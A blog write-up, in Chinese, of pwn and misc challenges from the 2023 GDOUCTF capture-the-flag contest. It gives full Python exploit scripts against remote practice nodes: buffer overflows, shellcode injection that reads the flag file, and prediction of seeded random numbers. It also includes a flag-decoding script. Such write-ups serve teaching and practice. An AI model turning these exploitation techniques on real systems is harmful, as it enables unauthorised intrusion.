Comentropy's Blog

2023 GDOUCTF Write Up

 CTF Write Up  1973  4 分钟  

PWN By Comentropy

EASY PWN

gets溢出绕过验证,让v5=1即可,预期exp如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *

local = 0
debug = 1

binary = "./easypwn"
e = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "node6.anna.nssctf.cn"
    port = "28018"
    p = remote(ip, port)
    lib = ""

init(lib, binary, p)
context = init_context("tmux", debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

name     = lambda obj : [name for name in globals() if globals()[name] is obj][0]
set_libc = lambda buf : set_libc_base_and_log(name(buf), buf)
lg       = lambda buf : log_addr(name(buf), buf)

padding = 0x1f - 4

pad = b''
pad += b'a' * padding
pad += p32(1)

ru(b'Password:')
sl(pad)

ia()

非预期:

image-20230416152643384

Shellcode

唯一需要注意的就是shellcode长度要求控制在0x25个字节内,然后buf溢出到rwx段即可。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *

local = 0
debug = 1

binary = "./pwn"
e = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "node4.anna.nssctf.cn"
    port = "28434"
    p = remote(ip, port)
    lib = ""

init(lib, binary, p)
context = init_context("tmux", debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

name     = lambda obj : [name for name in globals() if globals()[name] is obj][0]
set_libc = lambda buf : set_libc_base_and_log(name(buf), buf)
lg       = lambda buf : log_addr(name(buf), buf)

name_addr = 0x6010A0
leave_ret = 0x40074E

ru(b'Please.\n')
s(opcode.sh)

padding = 0xa + 8

pad = b''
pad += b'a' * padding
pad += p64(name_addr)

# ddebug()

ru(b"Let's start!\n")
s(pad)

ia()

真男人下120层

获取时间戳,预测随机数即可,远程可能因为延迟时间戳预测不准,可自行调节。对于没有远程libc的问题其实可以用本地,因为rand的算法大部分libc都是一样的,所以随便找个glibc理论上都行。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import time
from ctypes import *
from ckyan.pwn.my_script import *

t = int(time.time())

local = 0
debug = 1

binary = "./bin"
e = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "node2.anna.nssctf.cn"
    port = "28537"
    p = remote(ip, port)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"

dll = cdll.LoadLibrary(lib)
seed = dll.srand(t)

init(lib, binary, p)
context = init_context("tmux", debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

name     = lambda obj : [name for name in globals() if globals()[name] is obj][0]
set_libc = lambda buf : set_libc_base_and_log(name(buf), buf)
lg       = lambda buf : log_addr(name(buf), buf)

v4 = dll.rand()
seed2 = dll.srand(v4 % 3 - 0x5AB9D26E)

for i in range(120):
    ru(b'Floor')
    ru(b'\n\n')
    v6 = dll.rand() % 4 + 1
    sl(str(v6))

ia()

Random

同样获取时间戳,预测随机数,刚开始做的时候非常卡,时间戳一直不对,试了好久,错失前三血,只拿了第四。。。因为关了nx且禁止了execve,所以可以栈执行,长度太短不够orw,即先read,再orw即可。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import time
from ctypes import *
from ckyan.pwn.my_script import *

local = 0
debug = 1

t = int(time.time())

binary = "./RANDOM"
e = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "node5.anna.nssctf.cn"
    port = "28758"
    p = remote(ip, port)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"

dll = cdll.LoadLibrary(lib)
seed = dll.srand(t)

init(lib, binary, p)
context = init_context("tmux", debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

name     = lambda obj : [name for name in globals() if globals()[name] is obj][0]
set_libc = lambda buf : set_libc_base_and_log(name(buf), buf)
lg       = lambda buf : log_addr(name(buf), buf)

v6 = dll.rand() % 50

ru(b'please input a guess num:\n')

sl(str(v6))

padding = 0x20 + 8
jmp_rsp = 0x40094E

read = '''
    xor edi,edi
    mov rsi,rsp
    mov edx,0x1000
    xor eax,eax
    syscall
'''

pad1 = b''
pad1 += b'a' * padding
pad1 += p64(jmp_rsp)
pad1 += asm(read)

print(hex(len(pad1)))

# ddebug()

ru(b'your door')
s(pad1)

pad2 = b''
pad2 += b'a' * 14
pad2 += opcode.cat_flag

# ddebug()

s(pad2)

ia()

后面这两个是校内赛的,可以在nss平台复现。GDOUCTF 2023新生赛 | NSSCTF (ctfer.vip)

小学数学

源码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91

import random
import signal

def ran():
    return random.randint(999,99999)
def add():
    question = f"{ran()} + {ran()} = "

    print(question.replace('+','-'))
    answer = eval(question[:-2])
    
    calc = input()
    if calc == str(answer):
        print("Correct.")
    else:
        print("Wrong.")
        exit(0)

def sub():
    question = f"{ran()} - {ran()} = "

    print(question.replace('-','x'))
    answer = eval(question[:-2])
    
    calc = input()
    if calc == str(answer):
        print("Correct.")
    else:
        print("Wrong.")
        exit(0)

def mul():
    question = f"{ran()} x {ran()} = "

    print(question.replace('x','//'))
    answer = eval(question[:-2].replace('x','*'))
    
    calc = input()
    if calc == str(answer):
        print("Correct.")
    else:
        print("Wrong.")
        exit(0)

def div():
    question = f"{ran()} // {ran()} = "

    print(question.replace('//','%'))
    answer = eval(question[:-2])
    
    calc = input()
    if calc == str(answer):
        print("Correct.")
    else:
        print("Wrong.")
        exit(0)

def mod():
    question = f"{ran()} % {ran()} = "

    print(question.replace('%','+'))
    answer = eval(question[:-2])
    
    calc = input()
    if calc == str(answer):
        print("Correct.")
    else:
        print("Wrong.")
        exit(0)



print("  ____ ____   ___  _   _    ____ _____ _____ ")
print(" / ___|  _ \ / _ \| | | |  / ___|_   _|  ___|")
print("| |  _| | | | | | | | | | | |     | | | |_   ")
print("| |_| | |_| | |_| | |_| | | |___  | | |  _|  ")
print(" \____|____/ \___/ \___/   \____| |_| |_|    ")
print("												")
print("Welcome to the calculate challenge. Please try to solve 300 Question in 600 seconds.")
print("ATTENTION: This is an April Fool's game, and the real problem may not be what it seems")
print("")
input("Press Enter to start...")
signal.alarm(600)

for i in range(300):
    print("Round: "+str(i+1))
    random.choice([add,sub,mul,div,mod])()


flag = open('/flag').read()
print("Congratulations on passing the challenge. This is your flag: " + str(flag))

根据源码写脚本即可,笔者python学的很烂,仅供参考:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *

local = 0
debug = 0

binary = ""

if binary != "":
    e = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "node1.anna.nssctf.cn"
    port = "28488"
    p = remote(ip, port)
    lib = ""

init(lib, binary, p)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

name     = lambda obj : [name for name in globals() if globals()[name] is obj][0]
set_libc = lambda buf : set_libc_base_and_log(name(buf), buf)
lg       = lambda buf : log_addr(name(buf), buf)

ru(b'Press Enter to start...')
s(b'\n')

for i in range(300):

    ru("Round: " + str(i+1) + "\n")
    str_ques = ru(" = \n")[:-4].decode()
    # print(f"old => {str_ques}")

    if "-" in str_ques:
        str_ques = str_ques.replace("-"  , "+")
    elif "x" in str_ques:
        str_ques = str_ques.replace("x"  , "-")
    elif "//" in str_ques:
        str_ques = str_ques.replace("//" , "*")
    elif "%" in str_ques:
        str_ques = str_ques.replace("%"  , "//")
    elif "+" in str_ques:
        str_ques = str_ques.replace("+"  , "%")

    answer = eval(str_ques)
    # print(f"{str_ques} = {answer}")

    sl(str(answer))

ru("flag: ")
flag = ru(b"}")
print(f"flag => {flag}")

奇怪的ELF

这个有点像逆向题,emmm,没有远程,只给了附件。在ida里导出数据,然后异或即可,

ida主函数如下:

1
2
3
4
5
6
7
8

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+Ch] [rbp-14h]

  for ( i = 0; i < strlen(flag); ++i )
    putchar(flag[i] ^ 0x86);
  return 0;
}

1
2
3
4
5
6
7
8

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [xsp+8h] [xbp-8h]

  for ( i = 0; i < strlen(flag); ++i )
    printf("%c", flag[i] ^ 0x86u);
  return 0;
}

exp如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

flag1 = [
  '0xCE',
  '0xDC',
  '0xC5',
  '0xD2',
  '0xC0',
  '0xFD',
  '0xF1',
  '0xE3',
  '0xEA',
  '0xE5',
  '0xE9',
  '0xEB',
  '0xE3',
  '0xD9',
  '0xF2',
  '0xE9',
  '0xD9'
]

flag2 = [
  '0xF2',
  '0xEE',
  '0xE3',
  '0xD9',
  '0xCA',
  '0xEF',
  '0xE8',
  '0xF3',
  '0xFE',
  '0xD9',
  '0xF1',
  '0xE9',
  '0xF4',
  '0xEA',
  '0xE2',
  '0xA7',
  '0xFB'
]

flag = ""

for i in flag1:
    flag += chr(int(i, 16) ^ 0x86)

for i in flag2:
    flag += chr(int(i, 16) ^ 0x86)

print(flag)
updatedupdated2023-04-182023-04-18

相关文章:

加载评论